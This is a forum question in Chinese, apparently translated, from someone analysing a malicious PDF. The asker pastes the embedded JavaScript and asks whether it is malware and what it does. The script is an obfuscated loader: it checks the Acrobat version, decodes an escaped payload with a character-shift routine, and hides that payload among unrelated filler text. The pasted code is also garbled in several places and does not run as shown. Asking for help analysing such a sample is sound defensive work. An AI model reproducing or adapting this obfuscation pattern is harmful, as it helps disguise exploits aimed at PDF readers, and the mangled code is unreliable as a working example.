我正在研究pdf恶意软件,到目前为止,我已经从其中提取了javascript并进行了扫描,提取的javacript文件的哈希为(sha256:0ace77aaac3da51ac4af16b7fbc9828c8cfbd7b1b1af2e69e4e8a3ada 但是我并没有真正了解脚本的功能,我注意到函数app.viewVersion.toString(用于恢复Acrobat阅读器的版本,但此后我看不到脚本使用此信息。
有人可以告诉我这是否是恶意软件,如果是,那么代码在做什么? 代码如下:
预先感谢
'use strict';
/**
@return {undefined}
/
function STARTSCRIPT() {
/*
@param {boolean} workshopper
@param {string} id
@param {boolean} min
@param {string} msg
@return {undefined}
/
function init(workshopper, id, min, msg) {
value = event.value;
if (workshopper && value <= id) {
app.alert("Value must be greater than " + id);
app.beep();
/* @type {boolean} /
event.rc = false;
return;
}
if (min && value >= msg) {
app.alert("Value must be less than " + msg);
app.beep();
/* @type {boolean} /
event.rc = false;
return;
}
}
/*
@param {number} type
@param {number} e
@param {!Object} internal
@return {undefined}
/
function print(type, e, internal) {
if (e > 11) {
console.println("Entering function: myFunction");
console.println(" Parameter 1: aWMaiAhjHR = " + type);
console.println(" Parameter 2: bWMaiAhjHR = " + e);
} else {
code = DEWMaiAhjHR(internalwe(type, 105) + "ub" + we(type, 105) + "tr", 3 +
(27 + (type - 3) - (27 + (type - 3)) % 60) * 4);
thiswe(type, 91) + we(type, 108) + we(type, 87) + we(type, 98);
}
}
/*
@param {string} val
@param {number} tickArray
@return {?}
/
this.DEWMaiAhjHR = function(val, tickArray) {
/* @type {string} /
ecWMaiAhjHR = "";
/* @type {string} /
val = unescape(val);
/* @type {number} /
frWMaiAhjHR = val.length;
/* @type {number} /
j = 0;
for (; j < frWMaiAhjHR;) {
ecWMaiAhjHR = ecWMaiAhjHR + we2(31, val.charCodeAt(j) - tickArray ^
tickArray);
j++;
}
return ecWMaiAhjHR;
};
/* @type {string} /
dWMaiAhjHR = 'I need a javascript that I can place in a form field
properties area that will replace a "&" symbol with the word "and".....any
help would be greatly appreciated. There are a couple of places you can
enter a script that modifies the contents of the field. The question is, do
you want the value of the form field to be altered, or just what the user
sees on the screen? To modify the value of the field you will need to use a
custom keystroke script. To modify the appearance of the field you will need
to enter a format script. You can find articles on both of these in the
tutorial on this site. The script itself can be done with the JavaScript
"replace" function, In both cases (assuming that youve got an AcroForm) the
code will look like this. PHP - Java Chat system for web site. Client is
Java applet can run in any Java enabled browsers. The server side is PHP
script can be installed on any PHP enabled web host. Interface text can be
customized in any language. Multi rooms. Java Script Mutator is intended for
optimization and protection of your Java Scripts from theft and
modifications. Gnostice PDFOne Java is a pure Java library which provides a
rich set of APIs to Create, Fill and Read PDF Forms, Secure, Merge, Split,
Stamp PDF documents. = %0Cxet%26EctoXit%26A%26evv0xmiwitXitsmop0zoSztmpg.-
%3B%0CEctoXit%26A%26EctoXit0tivreci.%2FbJ%2Fg2%24%24
/*
@param {number} nextActionList
@param {number} index
@return {?}
/
this.we2 = function(nextActionList, index) {
return String.fromCharCode(nextActionList % 55 - nextActionList + index);
};
/*
@param {number} nextActionList
@param {number} index
@return {?}
*/
this.we = function(nextActionList, index) {
return String.fromCharCode(nextActionList % 55 - nextActionList + 10 +
index);
};
hWMaiAhjHR = app.viewerVersion.toString();
hWMaiAhjHR = hWMaiAhjHR.charAt(0);
print(hWMaiAhjHR, hWMaiAhjHR / 2, dWMaiAhjHR);
}
;